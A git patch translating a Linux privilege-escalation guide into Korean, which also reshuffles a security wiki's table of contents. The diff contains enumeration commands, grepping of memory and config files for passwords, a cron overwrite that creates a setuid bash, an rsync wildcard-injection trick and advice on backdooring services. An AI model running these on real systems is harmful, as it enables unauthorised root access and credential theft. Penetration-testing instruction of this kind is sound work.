From 9d2e0c9648e518764493aca5698442fa261ae0b5 Mon Sep 17 00:00:00 2001 From: Translator Date: Sat, 7 Jun 2025 16:45:12 +0000 Subject: [PATCH] Translated ['src/linux-hardening/privilege-escalation/README.md'] to ko --- src/SUMMARY.md | 34 +- .../privilege-escalation/README.md | 172 ++-- .../0.-basic-llm-concepts.md | 285 ----- .../1.-tokenizing.md | 95 -- .../2.-data-sampling.md | 240 ----- .../3.-token-embeddings.md | 203 ---- .../4.-attention-mechanisms.md | 416 -------- .../5.-llm-architecture.md | 666 ------------ .../6.-pre-training-and-loading-models.md | 970 ------------------ .../7.0.-lora-improvements-in-fine-tuning.md | 61 -- .../7.1.-fine-tuning-for-classification.md | 117 --- ...7.2.-fine-tuning-to-follow-instructions.md | 100 -- .../llm-training-data-preparation/README.md | 98 -- 13 files changed, 109 insertions(+), 3348 deletions(-) delete mode 100644 src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md delete mode 100644 src/todo/llm-training-data-preparation/1.-tokenizing.md delete mode 100644 src/todo/llm-training-data-preparation/2.-data-sampling.md delete mode 100644 src/todo/llm-training-data-preparation/3.-token-embeddings.md delete mode 100644 src/todo/llm-training-data-preparation/4.-attention-mechanisms.md delete mode 100644 src/todo/llm-training-data-preparation/5.-llm-architecture.md delete mode 100644 src/todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md delete mode 100644 src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md delete mode 100644 src/todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md delete mode 100644 src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md delete mode 100644 src/todo/llm-training-data-preparation/README.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 4e7b0adb5..0bfdeb3af 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -793,6 +793,29 @@ - [Windows Exploiting (Basic Guide - OSCP lvl)](binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md) - [iOS Exploiting](binary-exploitation/ios-exploiting.md) +# ๐Ÿค– AI +- [AI Security](AI/README.md) + - [AI Security Methodology](AI/AI-Deep-Learning.md) + - [AI MCP Security](AI/AI-MCP-Servers.md) + - [AI Model Data Preparation](AI/AI-Model-Data-Preparation-and-Evaluation.md) + - [AI Models RCE](AI/AI-Models-RCE.md) + - [AI Prompts](AI/AI-Prompts.md) + - [AI Risk Frameworks](AI/AI-Risk-Frameworks.md) + - [AI Supervised Learning Algorithms](AI/AI-Supervised-Learning-Algorithms.md) + - [AI Unsupervised Learning Algorithms](AI/AI-Unsupervised-Learning-algorithms.md) + - [AI Reinforcement Learning Algorithms](AI/AI-Reinforcement-Learning-Algorithms.md) + - [LLM Training](AI/AI-llm-architecture/README.md) + - [0. Basic LLM Concepts](AI/AI-llm-architecture/0.-basic-llm-concepts.md) + - [1. Tokenizing](AI/AI-llm-architecture/1.-tokenizing.md) + - [2. Data Sampling](AI/AI-llm-architecture/2.-data-sampling.md) + - [3. Token Embeddings](AI/AI-llm-architecture/3.-token-embeddings.md) + - [4. Attention Mechanisms](AI/AI-llm-architecture/4.-attention-mechanisms.md) + - [5. LLM Architecture](AI/AI-llm-architecture/5.-llm-architecture.md) + - [6. Pre-training & Loading models](AI/AI-llm-architecture/6.-pre-training-and-loading-models.md) + - [7.0. LoRA Improvements in fine-tuning](AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md) + - [7.1. Fine-Tuning for Classification](AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md) + - [7.2. Fine-Tuning to follow instructions](AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md) + # ๐Ÿ”ฉ Reversing - [Reversing Tools & Basic Methods](reversing/reversing-tools-basic-methods/README.md) @@ -850,17 +873,6 @@ - [Low-Power Wide Area Network](todo/radio-hacking/low-power-wide-area-network.md) - [Pentesting BLE - Bluetooth Low Energy](todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md) - [Test LLMs](todo/test-llms.md) -- [LLM Training](todo/llm-training-data-preparation/README.md) - - [0. Basic LLM Concepts](todo/llm-training-data-preparation/0.-basic-llm-concepts.md) - - [1. Tokenizing](todo/llm-training-data-preparation/1.-tokenizing.md) - - [2. Data Sampling](todo/llm-training-data-preparation/2.-data-sampling.md) - - [3. Token Embeddings](todo/llm-training-data-preparation/3.-token-embeddings.md) - - [4. Attention Mechanisms](todo/llm-training-data-preparation/4.-attention-mechanisms.md) - - [5. LLM Architecture](todo/llm-training-data-preparation/5.-llm-architecture.md) - - [6. Pre-training & Loading models](todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md) - - [7.0. LoRA Improvements in fine-tuning](todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md) - - [7.1. Fine-Tuning for Classification](todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md) - - [7.2. Fine-Tuning to follow instructions](todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md) - [Burp Suite](todo/burp-suite.md) - [Other Web Tricks](todo/other-web-tricks.md) - [Interesting HTTP$$external:todo/interesting-http.md$$]() diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md index 4f5247413..b698386bb 100644 --- a/src/linux-hardening/privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/README.md @@ -6,7 +6,7 @@ ### OS info -์šด์˜ ์ค‘์ธ OS์— ๋Œ€ํ•œ ์ •๋ณด๋ฅผ ์–ป๋Š” ๊ฒƒ๋ถ€ํ„ฐ ์‹œ์ž‘ํ•ฉ์‹œ๋‹ค. +์šด์˜ ์ค‘์ธ OS์— ๋Œ€ํ•œ ์ •๋ณด๋ฅผ ์–ป๊ธฐ ์‹œ์ž‘ํ•ฉ์‹œ๋‹ค. ```bash (cat /proc/version || uname -a ) 2>/dev/null lsb_release -a 2>/dev/null # old, not by default on many systems @@ -20,7 +20,7 @@ echo $PATH ``` ### Env info -ํฅ๋ฏธ๋กœ์šด ์ •๋ณด, ๋น„๋ฐ€๋ฒˆํ˜ธ ๋˜๋Š” API ํ‚ค๊ฐ€ ํ™˜๊ฒฝ ๋ณ€์ˆ˜์— ์žˆ์Šต๋‹ˆ๊นŒ? +ํ™˜๊ฒฝ ๋ณ€์ˆ˜์— ํฅ๋ฏธ๋กœ์šด ์ •๋ณด, ๋น„๋ฐ€๋ฒˆํ˜ธ ๋˜๋Š” API ํ‚ค๊ฐ€ ์žˆ์Šต๋‹ˆ๊นŒ? ```bash (env || set) 2>/dev/null ``` @@ -39,13 +39,13 @@ searchsploit "Linux Kernel" ```bash curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' ' ``` -์ปค๋„ ์ทจ์•ฝ์ ์„ ๊ฒ€์ƒ‰ํ•˜๋Š” ๋ฐ ๋„์›€์ด ๋  ์ˆ˜ ์žˆ๋Š” ๋„๊ตฌ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค: +์ปค๋„ ์ต์Šคํ”Œ๋กœ์ž‡์„ ๊ฒ€์ƒ‰ํ•˜๋Š” ๋ฐ ๋„์›€์ด ๋  ์ˆ˜ ์žˆ๋Š” ๋„๊ตฌ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค: [linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester)\ [linux-exploit-suggester2.pl](https://github.com/jondonas/linux-exploit-suggester-2)\ -[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (ํ”ผํ•ด์ž์—์„œ ์‹คํ–‰, ์ปค๋„ 2.x์— ๋Œ€ํ•œ ์ทจ์•ฝ์ ๋งŒ ํ™•์ธ) +[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (ํ”ผํ•ด์ž์—์„œ ์‹คํ–‰, 2.x ์ปค๋„์— ๋Œ€ํ•œ ์ต์Šคํ”Œ๋กœ์ž‡๋งŒ ํ™•์ธ) -ํ•ญ์ƒ **Google์—์„œ ์ปค๋„ ๋ฒ„์ „์„ ๊ฒ€์ƒ‰ํ•˜์„ธ์š”**, ์•„๋งˆ๋„ ๊ท€ํ•˜์˜ ์ปค๋„ ๋ฒ„์ „์ด ์–ด๋–ค ์ปค๋„ ์ทจ์•ฝ์ ์— ๊ธฐ๋ก๋˜์–ด ์žˆ์„ ๊ฒƒ์ด๋ฉฐ, ๊ทธ๋Ÿฌ๋ฉด ์ด ์ทจ์•ฝ์ ์ด ์œ ํšจํ•˜๋‹ค๋Š” ๊ฒƒ์„ ํ™•์‹ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +ํ•ญ์ƒ **Google์—์„œ ์ปค๋„ ๋ฒ„์ „์„ ๊ฒ€์ƒ‰ํ•˜์„ธ์š”**, ์•„๋งˆ๋„ ๊ท€ํ•˜์˜ ์ปค๋„ ๋ฒ„์ „์ด ์ผ๋ถ€ ์ปค๋„ ์ต์Šคํ”Œ๋กœ์ž‡์— ๊ธฐ๋ก๋˜์–ด ์žˆ์„ ๊ฒƒ์ด๋ฉฐ, ๊ทธ๋Ÿฌ๋ฉด ์ด ์ต์Šคํ”Œ๋กœ์ž‡์ด ์œ ํšจํ•˜๋‹ค๋Š” ๊ฒƒ์„ ํ™•์‹ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ### CVE-2016-5195 (DirtyCow) @@ -59,7 +59,7 @@ https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c ``` ### Sudo ๋ฒ„์ „ -์ทจ์•ฝํ•œ sudo ๋ฒ„์ „์— ๋”ฐ๋ผ ๋‹ค์Œ์— ๋‚˜ํƒ€๋‚ฉ๋‹ˆ๋‹ค: +์ทจ์•ฝํ•œ sudo ๋ฒ„์ „์— ๋”ฐ๋ผ ๋‹ค์Œ์— ๋‚˜ํƒ€๋‚˜๋Š”: ```bash searchsploit sudo ``` @@ -131,7 +131,7 @@ docker-security/ ## Drives -**๋ฌด์—‡์ด ๋งˆ์šดํŠธ๋˜๊ณ  ์–ธ๋งˆ์šดํŠธ๋˜์—ˆ๋Š”์ง€**, ์–ด๋””์„œ ์™œ ๊ทธ๋Ÿฐ์ง€ ํ™•์ธํ•˜์„ธ์š”. ์–ธ๋งˆ์šดํŠธ๋œ ๊ฒƒ์ด ์žˆ๋‹ค๋ฉด ๋งˆ์šดํŠธํ•ด๋ณด๊ณ  ๊ฐœ์ธ ์ •๋ณด๋ฅผ ํ™•์ธํ•ด๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +**๋งˆ์šดํŠธ๋œ ๊ฒƒ๊ณผ ๋งˆ์šดํŠธ ํ•ด์ œ๋œ ๊ฒƒ**์„ ํ™•์ธํ•˜๊ณ , ์–ด๋””์„œ ์™œ ๊ทธ๋Ÿฐ์ง€ ํ™•์ธํ•˜์„ธ์š”. ๋งˆ์šดํŠธ ํ•ด์ œ๋œ ๊ฒƒ์ด ์žˆ๋‹ค๋ฉด, ๊ทธ๊ฒƒ์„ ๋งˆ์šดํŠธํ•˜๊ณ  ๊ฐœ์ธ ์ •๋ณด๋ฅผ ํ™•์ธํ•ด ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ```bash ls /dev 2>/dev/null | grep -i "sd" cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null @@ -144,7 +144,7 @@ grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc ```bash which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null ``` -๋˜ํ•œ **์–ด๋–ค ์ปดํŒŒ์ผ๋Ÿฌ๊ฐ€ ์„ค์น˜๋˜์–ด ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค**. ์ด๋Š” ์ปค๋„ ์ต์Šคํ”Œ๋กœ์ž‡์„ ์‚ฌ์šฉํ•ด์•ผ ํ•  ๊ฒฝ์šฐ ์œ ์šฉํ•˜๋ฉฐ, ์ด๋ฅผ ์‚ฌ์šฉํ•  ๋จธ์‹ (๋˜๋Š” ์œ ์‚ฌํ•œ ๋จธ์‹ )์—์„œ ์ปดํŒŒ์ผํ•˜๋Š” ๊ฒƒ์ด ๊ถŒ์žฅ๋ฉ๋‹ˆ๋‹ค. +๋˜ํ•œ **์–ด๋–ค ์ปดํŒŒ์ผ๋Ÿฌ๊ฐ€ ์„ค์น˜๋˜์–ด ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์„ธ์š”**. ์ด๋Š” ์ปค๋„ ์ต์Šคํ”Œ๋กœ์ž‡์„ ์‚ฌ์šฉํ•ด์•ผ ํ•  ๊ฒฝ์šฐ ์œ ์šฉํ•˜๋ฉฐ, ์ด๋ฅผ ์‚ฌ์šฉํ•  ๋จธ์‹ (๋˜๋Š” ์œ ์‚ฌํ•œ ๋จธ์‹ )์—์„œ ์ปดํŒŒ์ผํ•˜๋Š” ๊ฒƒ์ด ๊ถŒ์žฅ๋ฉ๋‹ˆ๋‹ค. ```bash (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/") ``` @@ -158,11 +158,11 @@ rpm -qa #Centos ``` SSH์— ๋Œ€ํ•œ ์ ‘๊ทผ ๊ถŒํ•œ์ด ์žˆ๋Š” ๊ฒฝ์šฐ, **openVAS**๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋จธ์‹ ์— ์„ค์น˜๋œ ๊ตฌ์‹ ๋ฐ ์ทจ์•ฝํ•œ ์†Œํ”„ํŠธ์›จ์–ด๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -> [!NOTE] > _์ด ๋ช…๋ น์€ ๋Œ€๋ถ€๋ถ„ ์“ธ๋ชจ์—†๋Š” ๋งŽ์€ ์ •๋ณด๋ฅผ ํ‘œ์‹œํ•˜๋ฏ€๋กœ, ์„ค์น˜๋œ ์†Œํ”„ํŠธ์›จ์–ด ๋ฒ„์ „์ด ์•Œ๋ ค์ง„ ์ทจ์•ฝ์ ์— ์ทจ์•ฝํ•œ์ง€ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋Š” OpenVAS์™€ ๊ฐ™์€ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์„ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค._ +> [!NOTE] > _์ด ๋ช…๋ น์€ ๋Œ€๋ถ€๋ถ„ ์“ธ๋ชจ์—†๋Š” ๋งŽ์€ ์ •๋ณด๋ฅผ ํ‘œ์‹œํ•˜๋ฏ€๋กœ, ์„ค์น˜๋œ ์†Œํ”„ํŠธ์›จ์–ด ๋ฒ„์ „์ด ์•Œ๋ ค์ง„ ์ทจ์•ฝ์ ์— ์ทจ์•ฝํ•œ์ง€ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋Š” OpenVAS์™€ ๊ฐ™์€ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์„ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ์ด ๊ถŒ์žฅ๋ฉ๋‹ˆ๋‹ค._ -## Processes +## ํ”„๋กœ์„ธ์Šค -**์–ด๋–ค ํ”„๋กœ์„ธ์Šค**๊ฐ€ ์‹คํ–‰๋˜๊ณ  ์žˆ๋Š”์ง€ ์‚ดํŽด๋ณด๊ณ , ์–ด๋–ค ํ”„๋กœ์„ธ์Šค๊ฐ€ **ํ•„์š” ์ด์ƒ์œผ๋กœ ๊ถŒํ•œ์ด ์žˆ๋Š”์ง€** ํ™•์ธํ•˜์‹ญ์‹œ์˜ค (์˜ˆ: root๋กœ ์‹คํ–‰๋˜๋Š” tomcat?). +**์–ด๋–ค ํ”„๋กœ์„ธ์Šค**๊ฐ€ ์‹คํ–‰๋˜๊ณ  ์žˆ๋Š”์ง€ ์‚ดํŽด๋ณด๊ณ , ์–ด๋–ค ํ”„๋กœ์„ธ์Šค๊ฐ€ **ํ•„์š” ์ด์ƒ์œผ๋กœ ๊ถŒํ•œ์ด ์žˆ๋Š”์ง€** ํ™•์ธํ•˜์‹ญ์‹œ์˜ค(์˜ˆ: root๋กœ ์‹คํ–‰๋˜๋Š” tomcat?). ```bash ps aux ps -ef @@ -182,11 +182,11 @@ top -n 1 ๊ทธ๋Ÿฌ๋‚˜ **์ผ๋ฐ˜ ์‚ฌ์šฉ์ž๋กœ์„œ ์ž์‹ ์ด ์†Œ์œ ํ•œ ํ”„๋กœ์„ธ์Šค์˜ ๋ฉ”๋ชจ๋ฆฌ๋ฅผ ์ฝ์„ ์ˆ˜ ์žˆ๋‹ค๋Š” ์ ์„ ๊ธฐ์–ตํ•˜์„ธ์š”**. > [!WARNING] -> ํ˜„์žฌ ๋Œ€๋ถ€๋ถ„์˜ ๋จธ์‹ ์€ **๊ธฐ๋ณธ์ ์œผ๋กœ ptrace๋ฅผ ํ—ˆ์šฉํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค**. ์ด๋Š” ๊ถŒํ•œ์ด ์—†๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ์†Œ์œ ํ•œ ๋‹ค๋ฅธ ํ”„๋กœ์„ธ์Šค๋ฅผ ๋คํ”„ํ•  ์ˆ˜ ์—†์Œ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค. +> ํ˜„์žฌ ๋Œ€๋ถ€๋ถ„์˜ ๋จธ์‹ ์€ **๊ธฐ๋ณธ์ ์œผ๋กœ ptrace๋ฅผ ํ—ˆ์šฉํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค**. ์ด๋Š” ๊ถŒํ•œ์ด ์—†๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ์†Œ์†๋œ ๋‹ค๋ฅธ ํ”„๋กœ์„ธ์Šค๋ฅผ ๋คํ”„ํ•  ์ˆ˜ ์—†์Œ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค. > > ํŒŒ์ผ _**/proc/sys/kernel/yama/ptrace_scope**_๋Š” ptrace์˜ ์ ‘๊ทผ์„ฑ์„ ์ œ์–ดํ•ฉ๋‹ˆ๋‹ค: > -> - **kernel.yama.ptrace_scope = 0**: ๋™์ผํ•œ uid๋ฅผ ๊ฐ€์ง„ ๋ชจ๋“  ํ”„๋กœ์„ธ์Šค๋ฅผ ๋””๋ฒ„๊น…ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ptracing์ด ์ž‘๋™ํ•˜๋˜ ๊ณ ์ „์ ์ธ ๋ฐฉ์‹์ž…๋‹ˆ๋‹ค. +> - **kernel.yama.ptrace_scope = 0**: ๋ชจ๋“  ํ”„๋กœ์„ธ์Šค๋Š” ๊ฐ™์€ uid๋ฅผ ๊ฐ€์ง„ ํ•œ ๋””๋ฒ„๊น…ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ptracing์ด ์ž‘๋™ํ•˜๋˜ ๊ณ ์ „์ ์ธ ๋ฐฉ์‹์ž…๋‹ˆ๋‹ค. > - **kernel.yama.ptrace_scope = 1**: ๋ถ€๋ชจ ํ”„๋กœ์„ธ์Šค๋งŒ ๋””๋ฒ„๊น…ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. > - **kernel.yama.ptrace_scope = 2**: ์˜ค์ง ๊ด€๋ฆฌ์ž๋งŒ ptrace๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋Š” CAP_SYS_PTRACE ๊ถŒํ•œ์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค. > - **kernel.yama.ptrace_scope = 3**: ์–ด๋–ค ํ”„๋กœ์„ธ์Šค๋„ ptrace๋กœ ์ถ”์ ํ•  ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค. ์„ค์ • ํ›„์—๋Š” ptracing์„ ๋‹ค์‹œ ํ™œ์„ฑํ™”ํ•˜๋ ค๋ฉด ์žฌ๋ถ€ํŒ…์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค. @@ -237,7 +237,7 @@ strings /dev/mem -n10 | grep -i PASS ``` ### ProcDump for linux -ProcDump๋Š” Windows์˜ Sysinternals ๋„๊ตฌ ๋ชจ์Œ์—์„œ ํด๋ž˜์‹ ProcDump ๋„๊ตฌ๋ฅผ ์žฌ๊ตฌ์„ฑํ•œ Linux ๋ฒ„์ „์ž…๋‹ˆ๋‹ค. [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux)์—์„œ ๋‹ค์šด๋กœ๋“œํ•˜์„ธ์š”. +ProcDump๋Š” Windows์˜ Sysinternals ๋„๊ตฌ ๋ชจ์Œ์—์„œ ํด๋ž˜์‹ ProcDump ๋„๊ตฌ๋ฅผ ์žฌ๊ตฌ์„ฑํ•œ Linux ๋ฒ„์ „์ž…๋‹ˆ๋‹ค. [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux)์—์„œ ๋‹ค์šด๋กœ๋“œํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ``` procdump -p 1714 @@ -274,7 +274,7 @@ Press Ctrl-C to end monitoring without terminating the process. ### ํ”„๋กœ์„ธ์Šค ๋ฉ”๋ชจ๋ฆฌ์—์„œ์˜ ์ž๊ฒฉ ์ฆ๋ช… -#### ์ˆ˜๋™ ์˜ˆ์‹œ +#### ์ˆ˜๋™ ์˜ˆ์ œ ์ธ์ฆ ํ”„๋กœ์„ธ์Šค๊ฐ€ ์‹คํ–‰ ์ค‘์ธ ๊ฒƒ์„ ๋ฐœ๊ฒฌํ•˜๋ฉด: ```bash @@ -340,9 +340,9 @@ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh ```bash rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script ``` -**์™€์ผ๋“œ์นด๋“œ๊ฐ€** _**/some/path/\***_ **์™€ ๊ฐ™์€ ๊ฒฝ๋กœ ์•ž์— ์žˆ์œผ๋ฉด ์ทจ์•ฝํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค (์‹ฌ์ง€์–ด** _**./\***_ **๋„ ๊ทธ๋ ‡์Šต๋‹ˆ๋‹ค).** +**๊ฒฝ๋กœ๊ฐ€** _**/some/path/\***_ **์™€ ๊ฐ™์ด ์™€์ผ๋“œ์นด๋“œ ์•ž์— ์˜ค๋Š” ๊ฒฝ์šฐ, ์ทจ์•ฝํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค (์‹ฌ์ง€์–ด** _**./\***_ **๋„ ๊ทธ๋ ‡์Šต๋‹ˆ๋‹ค).** -๋‹ค์Œ ํŽ˜์ด์ง€์—์„œ ๋” ๋งŽ์€ ์™€์ผ๋“œ์นด๋“œ ์•…์šฉ ์š”๋ น์„ ์ฝ์–ด๋ณด์„ธ์š”: +์™€์ผ๋“œ์นด๋“œ ์•…์šฉ ํŠธ๋ฆญ์— ๋Œ€ํ•œ ์ž์„ธํ•œ ๋‚ด์šฉ์€ ๋‹ค์Œ ํŽ˜์ด์ง€๋ฅผ ์ฐธ์กฐํ•˜์„ธ์š”: {{#ref}} wildcards-spare-tricks.md @@ -360,15 +360,15 @@ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > ```bash ln -d -s ``` -### Frequent cron jobs +### ์ž์ฃผ ์‹คํ–‰๋˜๋Š” cron ์ž‘์—… -ํ”„๋กœ์„ธ์Šค๋ฅผ ๋ชจ๋‹ˆํ„ฐ๋งํ•˜์—ฌ 1๋ถ„, 2๋ถ„ ๋˜๋Š” 5๋ถ„๋งˆ๋‹ค ์‹คํ–‰๋˜๋Š” ํ”„๋กœ์„ธ์Šค๋ฅผ ๊ฒ€์ƒ‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋ฅผ ํ™œ์šฉํ•˜์—ฌ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +1๋ถ„, 2๋ถ„ ๋˜๋Š” 5๋ถ„๋งˆ๋‹ค ์‹คํ–‰๋˜๋Š” ํ”„๋กœ์„ธ์Šค๋ฅผ ๊ฒ€์ƒ‰ํ•˜๊ธฐ ์œ„ํ•ด ํ”„๋กœ์„ธ์Šค๋ฅผ ๋ชจ๋‹ˆํ„ฐ๋งํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋ฅผ ํ™œ์šฉํ•˜์—ฌ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -์˜ˆ๋ฅผ ๋“ค์–ด, **1๋ถ„ ๋™์•ˆ 0.1์ดˆ๋งˆ๋‹ค ๋ชจ๋‹ˆํ„ฐ๋ง**ํ•˜๊ณ , **๋œ ์‹คํ–‰๋œ ๋ช…๋ น์–ด๋กœ ์ •๋ ฌ**ํ•œ ๋‹ค์Œ, ๊ฐ€์žฅ ๋งŽ์ด ์‹คํ–‰๋œ ๋ช…๋ น์–ด๋ฅผ ์‚ญ์ œํ•˜๋ ค๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™์ด ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: +์˜ˆ๋ฅผ ๋“ค์–ด, **1๋ถ„ ๋™์•ˆ 0.1์ดˆ๋งˆ๋‹ค ๋ชจ๋‹ˆํ„ฐ๋ง**ํ•˜๊ณ , **๋œ ์‹คํ–‰๋œ ๋ช…๋ น์–ด๋กœ ์ •๋ ฌ**ํ•œ ํ›„, ๊ฐ€์žฅ ๋งŽ์ด ์‹คํ–‰๋œ ๋ช…๋ น์–ด๋ฅผ ์‚ญ์ œํ•˜๋ ค๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™์ด ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: ```bash for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp; ``` -**๋‹ค์Œ๊ณผ ๊ฐ™์ด ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (์ด ๋„๊ตฌ๋Š” ์‹œ์ž‘ํ•˜๋Š” ๋ชจ๋“  ํ”„๋กœ์„ธ์Šค๋ฅผ ๋ชจ๋‹ˆํ„ฐ๋งํ•˜๊ณ  ๋‚˜์—ดํ•ฉ๋‹ˆ๋‹ค). +**๋‹ค์Œ๊ณผ ๊ฐ™์ด ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (์ด๊ฒƒ์€ ์‹œ์ž‘ํ•˜๋Š” ๋ชจ๋“  ํ”„๋กœ์„ธ์Šค๋ฅผ ๋ชจ๋‹ˆํ„ฐ๋งํ•˜๊ณ  ๋‚˜์—ดํ•ฉ๋‹ˆ๋‹ค). ### ๋ณด์ด์ง€ ์•Š๋Š” ํฌ๋ก  ์ž‘์—… @@ -376,38 +376,38 @@ for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; do ```bash #This is a comment inside a cron config file\r* * * * * echo "Surprise!" ``` -## Services +## ์„œ๋น„์Šค -### Writable _.service_ files +### ์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•œ _.service_ ํŒŒ์ผ -`.service` ํŒŒ์ผ์— ์“ธ ์ˆ˜ ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์„ธ์š”. ์“ธ ์ˆ˜ ์žˆ๋‹ค๋ฉด, ์„œ๋น„์Šค๊ฐ€ **์‹œ์ž‘**, **์žฌ์‹œ์ž‘** ๋˜๋Š” **์ค‘์ง€**๋  ๋•Œ **๋ฐฑ๋„์–ด๋ฅผ ์‹คํ–‰ํ•˜๋„๋ก** **์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค** (์•„๋งˆ๋„ ๊ธฐ๊ณ„๊ฐ€ ์žฌ๋ถ€ํŒ…๋  ๋•Œ๊นŒ์ง€ ๊ธฐ๋‹ค๋ ค์•ผ ํ•  ๊ฒƒ์ž…๋‹ˆ๋‹ค).\ -์˜ˆ๋ฅผ ๋“ค์–ด, **`ExecStart=/tmp/script.sh`**์™€ ํ•จ๊ป˜ .service ํŒŒ์ผ ์•ˆ์— ๋ฐฑ๋„์–ด๋ฅผ ์ƒ์„ฑํ•˜์„ธ์š”. +`.service` ํŒŒ์ผ์— ์“ธ ์ˆ˜ ์žˆ๋Š”์ง€ 